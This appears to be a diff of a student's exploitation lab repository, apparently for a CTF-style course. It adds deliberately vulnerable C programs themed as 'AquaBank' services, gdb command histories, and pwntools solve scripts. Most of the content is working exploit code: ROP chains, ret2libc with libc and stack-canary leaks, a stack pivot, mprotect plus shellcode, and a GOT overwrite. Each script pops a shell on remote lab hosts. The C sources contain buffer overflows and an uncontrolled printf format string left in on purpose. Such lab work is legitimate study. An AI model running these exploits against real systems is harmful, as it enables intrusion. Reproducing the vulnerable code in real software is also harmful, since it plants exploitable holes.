rop and lab3_4_recap

lab3_4_recap/01_aquabank_armory/.gdb_history

@@ -0,0 +1,6 @@
+disass win
+disass main
+disass vuln
+r
+vmmap
+quit

lab3_4_recap/01_aquabank_armory/main.c

@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((naked, used)) void pop_rdi_ret(void) { __asm__("pop %rdi; ret"); }
+__attribute__((naked, used)) void pop_rsi_ret(void) { __asm__("pop %rsi; ret"); }
+__attribute__((naked, used)) void pop_rdx_ret(void) { __asm__("pop %rdx; ret"); }
+__attribute__((naked, used)) void syscall_ret(void) { __asm__("syscall; ret"); }
+
+static void vuln(void) {
+    char buf[64];
+
+    puts("[armory] Storeroom open -- pick your weapons:");
+    (void)read(STDIN_FILENO, buf, 512);
+    puts("[armory] Locking down.");
+}
+
+int main(void) {
+    setup();
+    vuln();
+    return 0;
+}

lab3_4_recap/01_aquabank_armory/solve.py

@@ -0,0 +1,36 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./aquabank-armory", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13540)
+print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))
+ret = 0x000000000040101A
+syscall = 0x0000000000401324
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x00000000004214EB
+writable = 0x4AC000
+mov_qword_ptr_rdx_rax = 0x000000000040AB08
+shellstr = b"/bin/sh\x00"
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdx),
+    p64(writable),
+    p64(pop_rax),
+    shellstr,
+    p64(mov_qword_ptr_rdx_rax),
+    p64(pop_rax),
+    p64(59),
+    p64(pop_rdi),
+    p64(writable),
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    p64(syscall),
+)
+p.sendline(payload)
+p.interactive()

lab3_4_recap/02_aquabank_atm/.gdb_history

@@ -0,0 +1,30 @@
+b withdrawal
+b withdraw
+r
+got
+vmmap
+display/w &note
+b withdraw
+r
+display/w &note
+quit
+display/w note
+display/w &note
+3
+r
+mmap
+vmap
+vmmap
+quit
+b withdraw
+r
+vmmap
+quit
+vmmap
+r
+vmmap
+b *withdraw
+r
+vmmap
+vmmap libc
+quit

lab3_4_recap/02_aquabank_atm/find_libc.py

@@ -0,0 +1,18 @@
+from pwn import *
+
+context.binary = elf = ELF("./aquabank-atm_patched", checksec=False)
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13523)
+print(p.recvuntil(b"> "))
+for i in range(1, 400):
+    p.sendline(b"1")
+    p.recvuntil(b"Type your customer note: ")
+    payload = f"%{i}$p"
+    p.sendline(payload.encode())
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    p.recvuntil(b"--- Your customer note ---\n")
+    addr = p.recvline()
+    if b"0x7f" in addr:
+        print(f"Address:{addr} at pos:{i}")
+    p.recvuntil(b"> ")

lab3_4_recap/02_aquabank_atm/main.c

@@ -0,0 +1,76 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define NOTE_MAX 96
+
+static char note[NOTE_MAX];
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+    puts("=== Welcome to AquaBank ATM, v4.0 ===");
+    puts("Set a customer note, then withdraw at your convenience.");
+}
+
+static void set_note(void) {
+    printf("Type your customer note: ");
+    fflush(stdout);
+    if (!fgets(note, sizeof(note), stdin)) return;
+    note[strcspn(note, "\n")] = 0;
+    puts("Saved.");
+}
+
+static void print_note(void) {
+    puts("--- Your customer note ---");
+    printf(note);
+    puts("");
+    puts("--------------------------");
+}
+
+static void withdraw(void) {
+    char from[32];
+    char amount[32];
+    char memo[64];
+
+    printf("From account: ");  fflush(stdout); fgets(from,   sizeof(from),   stdin);
+    printf("Amount: ");        fflush(stdout); fgets(amount, sizeof(amount), stdin);
+    puts("Withdrawal memo (be brief):");
+
+    fgets(memo, 256, stdin);
+
+    printf("Queued withdrawal from %samount %s\n", from, amount);
+}
+
+static void menu(void) {
+    char line[16];
+    while (1) {
+        puts("");
+        puts("=== AquaBank ATM ===");
+        puts("1) Set customer note");
+        puts("2) Print customer note");
+        puts("3) Withdraw");
+        puts("4) Exit");
+        printf("> "); fflush(stdout);
+        if (!fgets(line, sizeof(line), stdin)) break;
+        switch (atoi(line)) {
+            case 1: set_note();    break;
+            case 2: print_note();  break;
+            case 3: withdraw();    break;
+            case 4: puts("Bye");   return;
+            default: puts("?");
+        }
+    }
+}
+
+int main(void) {
+    setup();
+    banner();
+    menu();
+    return 0;
+}

lab3_4_recap/02_aquabank_atm/solve.py

@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+# exe = ELF("./aquabank-atm_patched")
+exe = ELF("./aquabank-atm")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process([exe.path])
+        if args.GDB:
+            gdb.attach(r)
+    else:
+        r = remote("offsec.m0lecon.it", 13523)
+
+    return r
+
+
+def main():
+    p = conn()
+    OFF = 128  # On withdrawal
+    p.recvuntil(b"> ")
+    p.sendline(b"1")
+    # payload = b"%114$p" (local offset)
+    # payload = b"%74$p"  # (remote offset)
+    # payload = b"%112$p"
+    # payload = b"%33$p"
+    payload = b"%33$p"
+    p.sendline(payload)
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    p.recvuntil(b"--- Your customer note ---\n")
+    addr = int(p.recvline().strip(), 16)
+    # libc.address = addr & ~0xFFFFF
+    libc.address = addr - libc.symbols["__libc_start_main"] - 0x8B
+    # libc.address = addr & ~0xFFF
+    print(f"Address: {hex(libc.address)}")
+    BINSH = next(libc.search(b"/bin/sh\x00"))
+    # Stage 2 write the binsh string at a fixed address (note array)
+    # binsh = b"/bin/sh"
+    # p.recvuntil(b"> ")
+    # p.sendline(b"1")
+    # p.sendline(binsh)
+    print(p.recvuntil(b"> "))
+
+    # Stage 3 Buffer overflow and system call
+    p.sendline(b"3")
+    print(p.recvuntil(b"From account: "))
+    p.sendline(b"A")
+    print(p.recvuntil(b"Amount: "))
+    p.sendline(b"10")
+    print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+    ret = 0x000000000040101A
+    ret_libc = 0x000000000002882F
+    pop_rdi = 0x000000000010F78B
+    pop_rsi = 0x0000000000110A7D
+    syscall = 0x00000000000288B5
+    pop_rax = 0x00000000000DD237
+    payload = flat(
+        b"A" * (OFF),
+        p64(ret),
+        # p64(ret_libc),
+        p64(libc.address + pop_rdi),
+        # p64(exe.symbols["note"]),
+        p64(BINSH),
+        # p64(ret_libc),
+        # p64(exe.symbols["main"]),
+        # p64(libc.symbols["puts"]),
+        p64(ret),
+        p64(libc.symbols["system"]),
+        # p64(exe.symbols["main"]),
+        # p64(libc.symbols["system"]),
+    )
+    # p.interactive()
+    p.send(payload + b"\n")
+    # p.interactive()
+    # %114$p
+    # %130$p
+
+    # good luck pwning :)
+
+    p.interactive()
+
+
+if __name__ == "__main__":
+    main()

lab3_4_recap/02_aquabank_atm/solve.py.bak

@@ -0,0 +1,55 @@
+from pwn import *
+
+OFF = 128  # On withdrawal
+# %25$lx
+context.binary = elf = ELF("./aquabank-atm", checksec=False)
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13508)
+PRINTF_GOT = elf.got["printf"]
+# Uso printf per stamparmi il libc address
+# Uso save note per salvarmi /bin/sh nel buffer
+# Salvo indirizzo di libc e chiamo system con /bin/sh
+p.recvuntil(b"> ")
+p.sendline(b"1")
+# payload = b"%114$p" (local offset)
+payload = b"%74$p"  # (remote offset)
+p.sendline(payload)
+p.recvuntilb(b"> ")
+p.sendline(b"2")
+p.recvuntil(b"--- Your customer note ---\n")
+addr = int(p.recvline().strip(), 16)
+libc.address = addr
+print(f"Address: {hex(addr)}")
+# Stage 2 write the binsh string at a fixed address (note array)
+binsh = b"/bin/sh"
+note_addr = 0x4040A0
+p.recvuntilb(b"> ")
+p.sendline(b"1")
+p.sendline(binsh)
+print(p.recvuntilb(b"> "))
+#
+# Stage 3 Buffer overflow and system call
+p.sendline(b"3")
+print(p.recvuntil(b"From account: "))
+p.sendline(b"A")
+print(p.recvuntil(b"Amount: "))
+p.sendline(b"10")
+print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+ret = 0x000000000040101A
+ret_libc = 0x000000000002882F
+pop_rdi = 0x000000000010F78B
+payload = flat(
+    b"A" * (OFF),
+    # p64(ret),
+    p64(libc.address + pop_rdi),
+    p64(note_addr),
+    p64(
+        libc.symbols["system"],
+    ),
+)
+p.sendline(payload)
+p.interactive()
+# %114$p
+# %130$p

lab3_4_recap/03_aquabank_vault/.gdb_history

@@ -0,0 +1,6 @@
+r
+r
+r
+r
+vmmap
+quit

lab3_4_recap/03_aquabank_vault/main.c

@@ -0,0 +1,62 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+    puts("=== AquaBank Safe Deposit Vault ===");
+    puts("Insert your card to issue a receipt or open the vault.");
+}
+
+static void print_receipt(void) {
+    char buf[64];
+
+    puts("Type the receipt header (up to 64 chars):");
+    ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
+    if (n <= 0) return;
+
+    puts("--- RECEIPT ---");
+    fwrite(buf, 1, 256, stdout);
+    puts("");
+    puts("---------------");
+}
+
+static void open_vault(void) {
+    char combo[128];
+
+    puts("Enter your combination:");
+    (void)read(STDIN_FILENO, combo, 512);
+    printf("Combination registered: %.32s ...\n", combo);
+}
+
+static void menu(void) {
+    char line[16];
+    while (1) {
+        puts("");
+        puts("=== AquaBank Vault ===");
+        puts("1) Print receipt");
+        puts("2) Open vault");
+        puts("3) Exit");
+        printf("> "); fflush(stdout);
+        if (!fgets(line, sizeof(line), stdin)) break;
+        switch (atoi(line)) {
+            case 1: print_receipt(); break;
+            case 2: open_vault();    return;
+            case 3: puts("Bye");     return;
+            default: puts("?");
+        }
+    }
+}
+
+int main(void) {
+    setup();
+    banner();
+    menu();
+    return 0;
+}

lab3_4_recap/03_aquabank_vault/solve.py

@@ -0,0 +1,125 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+exe = ELF("./aquabank-vault_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process([exe.path])
+        if args.GDB:
+            gdb.attach(r)
+    else:
+        r = remote("offsec.m0lecon.it", 13533)
+
+    return r
+
+
+def main():
+    p = conn()
+    print(p.recvuntil(b"> "))
+    p.sendline(b"1")
+    print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n"))
+
+    p.sendline(b"A" * 64)
+    # p.sendline(b"A" * 1)
+    print(p.recvline())
+    # print(p.recvline()[64 + 8 : 64 + 16])
+    leak = p.recvline()
+    print(leak[64:])
+    canary = leak[64 + 8 : 64 + 16].strip()
+    # canary = canary[::-1]
+    # canary = int(canary, 16)
+    print(f"Canary:{canary} len: {len(canary)}")
+    p.recvuntil(b"> ")
+    p.sendline(b"2")
+    print(p.recvuntil(b"Enter your combination:\n"))
+    # p.interactive()
+    payload = flat(
+        # b"A" * 128,
+        b"A" * 136,
+        canary,
+        b"STOPHERE",
+        exe.symbols["print_receipt"],
+        exe.symbols["main"],
+    )
+    p.send(payload)
+    p.recvline()
+    # print(p.recvline())
+    # print(p.recvuntil(b"Enter your combination:\n"))
+    # print(p.recvuntil(b"> "))
+    # p.sendline(b"1")
+    # print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n"))
+    pause()
+    p.sendline(b"A" * 64)
+    p.recvline()
+    p.recvline()
+
+    first_leak = p.recvline()[64:].strip()
+    print(f"Leak: {first_leak} len: {len(first_leak)}")
+    leak = p.recvline().strip()
+    first_leak += leak
+    count = 0
+    addr = 0
+    for i in range(len(first_leak)):
+        if first_leak[i] == 0x7F:
+            addr_raw = first_leak[i : i - 6 : -1].strip()
+            addr = int.from_bytes(addr_raw, byteorder="big")
+            if count == 4:
+                print(f"Address: {hex(addr)}")
+                break
+            count = count + 1
+            # FIFTH INDEX (5)
+            # for i in range(23):
+    # print(f"Address - puts:{hex(addr - libc.symbols['puts'])}")
+    # print(f"Address - read:{hex(addr - libc.symbols['read'])}")
+    # print(f"Address - fwrite:{hex(addr - libc.symbols['fwrite'])}")
+    print(f"Address - start_main:{hex(addr - libc.symbols['__libc_start_main'] + 54)}")
+    libc.address = addr - libc.symbols["__libc_start_main"] + 54
+    print(p.recvuntil(b"> "))
+    p.sendline(b"2")
+    print(p.recvuntil(b"Enter your combination:\n"))
+    pop_rdi = 0x000000000010F78B
+    ret_libc = 0x000000000002882F
+    ret = 0x000000000040101A
+    BINSH = next(libc.search(b"/bin/sh\x00"))
+    ropchain = flat(
+        b"A" * 136,
+        canary,
+        p64(ret),
+        p64(libc.address + pop_rdi),
+        BINSH,
+        p64(ret),
+        # p64(libc.symbols["puts"]),
+        p64(libc.symbols["system"]),
+    )
+    p.sendline(ropchain)
+    p.interactive()
+    # print(f"Address - printf:{hex(addr - libc.symbols['printf'])}")
+    # print(f"Address - setvbuf:{hex(addr - libc.symbols['setvbuf'])}")
+    #    addr = first_leak[i * 8 : (i * 8) + 9]
+    #    addr = addr[::-1]
+    #    print(f"Address: {addr}")
+
+    # pause()
+    # p.sendline(b"A" * 1)
+    # leak = p.recvline()
+    # print(f"LEAK:{leak[64:]}")
+    # print(p.recvline())
+    # print(p.recvline())
+    # print(p.recvline()[64 + 8 : 64 + 16])
+    # leak = p.recvline()
+    # print(leak[64:])
+    # p.interactive()
+    # good luck pwning :)
+
+    # p.interactive()
+
+
+if __name__ == "__main__":
+    main()

lab3_4_recap/04_aquabank_safe/.gdb_history

@@ -0,0 +1,26 @@
+disass deposit
+b *0x000000000000135f
+r
+b deposit
+r
+r
+clear
+clear 1
+quit
+b deposit
+r
+disass deposit
+b *0x000055555555535c
+c
+info registers 
+disass deposit
+disass open_safe
+r
+b open_safe
+r
+disass open_safe
+b *0x00005555555553f5
+c
+disass open_safe
+info registers
+disass deposit

lab3_4_recap/04_aquabank_safe/main.c

@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+    puts("=== AquaBank Premium Safe ===");
+    puts("PIE-protected vault.  No leaks. (Or are there?)");
+}
+
+char vault[0x4000];
+
+static void deposit(void) {
+    int n;
+    printf("[deposit] Vault deposit size (bytes): ");
+    if (scanf("%d", &n) != 1) return;
+    int c; while ((c = getchar()) != '\n' && c != EOF) {}
+    if (n < 0 || n > (int)sizeof(vault)) { puts("bad size"); return; }
+    printf("[deposit] Send %d bytes:\n", n);
+    (void)read(STDIN_FILENO, vault, n);
+    puts("[deposit] Deposit registered.");
+}
+
+static void diagnostics(void) {
+    printf("[diag] printf @ %p\n", (void*)printf);
+    printf("[diag] entry  @ %p\n", (void*)&diagnostics);
+}
+
+static void open_safe(void) {
+    char buf[8];
+    puts("[safe] Enter the 24-byte combination:");
+    (void)read(STDIN_FILENO, buf, 24);
+}
+
+static void menu(void) {
+    char line[16];
+    while (1) {
+        puts("");
+        puts("=== AquaBank Premium Safe ===");
+        puts("1) Diagnostics");
+        puts("2) Vault deposit");
+        puts("3) Open safe");
+        puts("4) Exit");
+        printf("> "); fflush(stdout);
+        if (!fgets(line, sizeof(line), stdin)) break;
+        switch (atoi(line)) {
+            case 1: diagnostics(); break;
+            case 2: deposit();     break;
+            case 3: open_safe();   return;
+            case 4: puts("Bye");   return;
+            default: puts("?");
+        }
+    }
+}
+
+int main(void) {
+    setup();
+    banner();
+    menu();
+    return 0;
+}

lab3_4_recap/04_aquabank_safe/solve.py

@@ -0,0 +1,122 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+exe = ELF("./aquabank-safe_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process([exe.path])
+        if args.GDB:
+            gdb.attach(r)
+    else:
+        r = remote("offsec.m0lecon.it", 13502)
+
+    return r
+
+
+def main():
+    p = conn()
+    # Stage 1 take the libc base address and PIE base address
+    print(p.recvuntil(b"> "))
+    p.sendline(b"1")
+    printf = int(p.recvline().split(b"@")[1].strip(), 16)
+    diagnostics = int(p.recvline().split(b"@")[1].strip(), 16)
+    libc.address = printf - libc.symbols["printf"]
+    base_pie = diagnostics - exe.symbols["diagnostics"]
+    print(hex(libc.address))
+    print(hex(base_pie))
+    #
+    # Save ropchain in the buffer
+    print(p.recvuntil(b"> "))
+    p.sendline(b"2")
+    print(p.recvuntil(b"[deposit] Vault deposit size (bytes): "))
+    # p.interactive()
+    p.sendline(b"16000")
+    # p.send(b"\n")
+    print(p.recvline())
+
+    BINSH = next(libc.search(b"/bin/sh\x00"))
+    ret = base_pie + 0x000000000000101A
+    pop_rdi = libc.address + 0x000000000010F78B
+    pop_rsi = libc.address + 0x0000000000110A7D
+    pop_rax = libc.address + 0x00000000000DD237
+    xchg_edx_eax = libc.address + 0x000000000011EA8A
+    ret_libc = libc.address + 0x000000000002882F
+    rop_chain = flat(
+        # p64(ret),
+        # b"A" * 16,
+        b"A" * 8,
+        # p64(0x0),
+        p64(ret_libc),
+        p64(pop_rax),
+        p64(0),
+        p64(pop_rdi),
+        BINSH,
+        p64(pop_rsi),
+        p64(0),
+        p64(xchg_edx_eax),
+        # p64(base_pie + exe.symbols["menu"]),
+        # b"A" * 128,
+        p64(ret_libc),
+        p64(libc.symbols["execve"]),
+        # p64(libc.symbols["puts"]),
+    )
+    p.sendline(rop_chain)
+    #
+    # BOF and return to vault
+    print(p.recvuntil(b"> "))
+    p.sendline(b"3")
+    print(p.recvline())
+    # Move the stack point to vault where the ROP Chain is.
+    # pop_rsp = base_pie + 0x000000000003C068
+    # leave -> mov rsp, rbp pop rbp ( so we set target - 8 bytes)
+    # leave = libc.address + 0x00000000000299D2
+    leave = base_pie + 0x0000000000001385
+    pop_rsp = libc.address + 0x000000000003C068
+    print(f"Vault addr:{hex(base_pie + exe.symbols['vault'])}")
+    payload = flat(
+        b"A" * 8,
+        # p64(leave),
+        # p64(base_pie + exe.symbols["vault"]),
+        # p64(leave),
+        # p64(ret),
+        # p64(pop_rsp),
+        # b"B" * 8,
+        p64(base_pie + exe.symbols["vault"]),
+        # p64(base_pie + exe.symbols["vault"]),
+        p64(leave),
+    )
+    print(f"Payload len:{len(payload)}")
+    context.terminal = ["alacritty", "-e", "sh", "-c"]
+    # gdb.attach(p)
+    # pause()
+    p.sendline(payload)
+    # p.send(b"\n")
+
+    # We switch to the read function in deposit
+    """final_p = flat(
+        b"A" * 0x4000,
+        p64(ret),
+        p64(pop_rdi),
+        BINSH,
+        p64(ret),
+        p64(
+            libc.symbols["system"],
+        ),
+    )"""
+    # p.send(final_p)
+    # print(p.recvuntil(b"[safe] Enter the 24-byte combination:\n"))
+    # print(p.recvline())
+    # p.interactive()
+    # good luck pwning :)
+    p.interactive()
+
+
+if __name__ == "__main__":
+    main()

ret2libc/01_neon_diner/.gdb_history

@@ -0,0 +1,2 @@
+r
+quit

rop/01_toolkit/.gdb_history

@@ -0,0 +1,11 @@
+r
+disass win
+disass main
+disass main
+disass win
+quit
+disass win
+disass main
+disass wuln
+disass vuln
+quit

rop/01_toolkit/solve.py

@@ -0,0 +1,31 @@
+from pwn import *
+
+OFFSET = 64
+context.binary = elf = ELF("./toolkit", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13554)
+
+var1 = 0x1111111111111111
+var2 = 0x2222222222222222
+var3 = 0x3333333333333333
+
+pop_rdi = 0x00000000004011FF
+pop_rdx = 0x0000000000401211
+pop_rsi = 0x0000000000401208
+ret = 0x000000000040101A
+win = 0x000000000040121E
+print(p.recvuntil(b"[toolkit] Input: "))
+payload = flat(
+    b"A" * OFFSET,
+    p64(ret),
+    p64(pop_rdi),
+    p64(var1),
+    p64(pop_rsi),
+    p64(var2),
+    p64(pop_rdx),
+    p64(var3),
+    p64(win),
+)
+p.send(payload)
+p.send(b"\n")
+p.interactive()

rop/02_forge/.gdb_history

@@ -0,0 +1,7 @@
+disass vuln
+disass win
+disass vuln
+disass main
+disass shellcode
+r
+disass main

rop/02_forge/solve.py

@@ -0,0 +1,37 @@
+from pwn import *
+
+context.binary = elf = ELF("./forge", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13574)
+OFF_INPUT = 64
+ret = 0x000000000040101A
+pop_rdi = 0x00000000004011FB
+pop_rsi = 0x0000000000401204
+pop_rdx = 0x000000000040120D
+shellcode_addr = 0x0000000000404080
+MPROTECT_PLT = elf.plt["mprotect"]
+PROT = 0x7
+
+print(p.recvuntil(b"[forge] Send shellcode:\n"))
+shellcode = flat(asm(shellcraft.sh()))
+SHELLCODE_SIZE = 200
+p.send(shellcode)
+# p.send(b"A")
+# p.send(b"\n")
+print(p.recvuntil(b"[forge] Input:\n"))
+payload = flat(
+    b"A" * OFF_INPUT,
+    p64(ret),
+    p64(pop_rdi),
+    p64(shellcode_addr & 0xFFFFF000),  # Must be page aligned
+    p64(pop_rsi),
+    4096,
+    p64(pop_rdx),
+    p64(PROT),
+    # p64(ret),
+    p64(MPROTECT_PLT),
+    p64(shellcode_addr),
+)
+p.send(payload)
+# p.send(b"\n")
+p.interactive()

rop/03_chain_reactor/.gdb_history

@@ -0,0 +1,8 @@
+disass main
+disass vuln
+disass main
+b *0x000000000040132a
+r
+c
+disass win
+quit

rop/03_chain_reactor/solve.py

@@ -0,0 +1,24 @@
+from pwn import *
+
+OFF = 64
+pop_rdi = 0x000000000040121F
+pop_rsi = 0x0000000000401221
+ret = 0x000000000040101A
+var1 = 0xC0FFEE
+var2 = 0xBADC0DE
+win = 0x0000000000401226
+context.binary = elf = ELF("./chain_reactor", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13510)
+print(p.recvuntil(b"[chain-reactor] Enter activation codes: "))
+payload = flat(
+    b"A" * 64,
+    p64(ret),
+    p64(pop_rdi),
+    p64(var1),
+    p64(pop_rsi),
+    p64(var2),
+    p64(win),
+)
+p.sendline(payload)
+p.interactive()

rop/04_arsenal/.gdb_history

@@ -0,0 +1,8 @@
+quit
+disass main
+disass vuln
+r
+disass vuln
+disass main
+vmmap
+quit

rop/04_arsenal/solve.py

@@ -0,0 +1,38 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./arsenal", checksec=False)
+shellstr = b"/bin/sh\x00"
+ret = 0x000000000040101A
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x0000000000401989  # Assign 59 (execve) to rax
+syscall = 0x0000000000401324
+WRITE_ADDR = 0x4AA000
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13594)
+print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n"))
+mov_qword_ptr_rdx_rax = 0x000000000040AB18  # mov qword ptr [rdx], rax; ret
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdx),
+    p64(WRITE_ADDR),
+    p64(pop_rax),
+    shellstr,
+    p64(mov_qword_ptr_rdx_rax),  # Write /bin/sh to a writable address in memory
+    p64(pop_rax),
+    p64(0x3B),  # 59 is the execve syscall
+    p64(pop_rdi),
+    p64(
+        WRITE_ADDR
+    ),  # Address where I wrote /bin/sh so in RDI there is a pointer (char*)
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    p64(syscall),
+)
+p.sendline(payload)
+p.interactive()

rop/04_arsenal/test.c

@@ -0,0 +1,6 @@
+#include <unistd.h>
+#include <stdio.h>
+int main(){
+    execve("/bin/sh",0,0);
+    return 0;
+}

rop/05_padlock/.gdb_history

@@ -0,0 +1,44 @@
+disass main
+disass vuln
+r
+disass win
+vmmap
+disass main
+disass vuln
+disass main
+disass vuln
+got
+quit
+got
+r
+got
+b vuln
+r
+got
+n
+got
+n
+disass vuln
+b *0x401282
+c
+got
+b main
+r
+got
+r
+got
+find
+find %
+find x
+search "%x"
+search "[padlock]"
+R
+r
+search "[padlock]"
+got
+search "[padlock]"
+r
+got
+c
+got
+quit

rop/05_padlock/solve.py

@@ -0,0 +1,68 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13582)
+PRINTF_PLT = elf.plt["printf"]
+ATOI_PLT = elf.plt["atoi"]
+PRINTF_GOT = elf.got["printf"]
+READ_GOT = elf.got["read"]
+MAIN = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF  # format string
+pop_rsi = 0x0000000000401208  # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+mov_eax_pop_rbp = 0x4012B0
+mov_eax = 0x000000000040127D
+# Mi serve scrivere binsh da qualche parte
+# Mi serve trovare libc addr e chiamare system
+rw_addr = 0x405000
+# search it in libc
+BINSH = next(libc.search(b"/bin/sh\x00"))
+format_addr = 0x402028
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    # ATOI returns in rax, make it return 0 to set rax
+    p64(pop_rdi),
+    p64(format_addr),
+    p64(ATOI_PLT),
+    p64(pop_rdi),
+    # Since the GOT is a ptr I directly give it to printf to print the actual libc address
+    p64(PRINTF_GOT),
+    p64(ret),
+    p64(PRINTF_PLT),
+    p64(ret),
+    p64(MAIN),
+)
+p.send(payload)
+print(p.recvline())
+# print(p.recvline())
+leaked = p.recvline().strip().split(b"[")[0]
+leak_printf = u64(leaked.ljust(8, b"\x00"))
+print(f"Leaked addr:{hex(leak_printf)}")
+print(p.recvuntil(b"combination: "))
+libc.address = leak_printf - libc.symbols["printf"]
+
+BINSH = next(libc.search(b"/bin/sh\x00"))
+payload2 = flat(
+    b"A" * OFF,
+    # p64(ret),
+    p64(pop_rdi),
+    p64(BINSH),
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    # p64(ret),
+    p64(libc.symbols["execve"]),
+)
+print(f"Binsh: {hex(BINSH)} System: {hex(libc.symbols['execve'])}")
+p.sendline(payload2)
+p.interactive()
+# print(p.recvuntil(b"[padlock] Decimal combination: "))

rop/05_padlock/solve2.py

@@ -0,0 +1,44 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13543)
+
+add_what = elf.sym["add_what_where"]
+atoi_got = elf.got["atoi"]
+main = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF  # format string
+pop_rsi = 0x0000000000401208  # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+
+# populate got table
+first_run = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(main),
+)
+p.sendline(first_run)
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+diff = libc.symbols["system"] - libc.symbols["atoi"]
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdi),
+    p64(atoi_got),
+    p64(pop_rsi),
+    p64(diff),
+    p64(add_what),
+    p64(ret),
+    p64(main),
+)
+p.sendline(payload)
+p.sendline(b"/bin/sh")
+p.interactive()

rop/05_padlock/test.c

@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(){
+    int var1 = 5;
+    printf("Address: %d",&var1);
+    return 0;
+}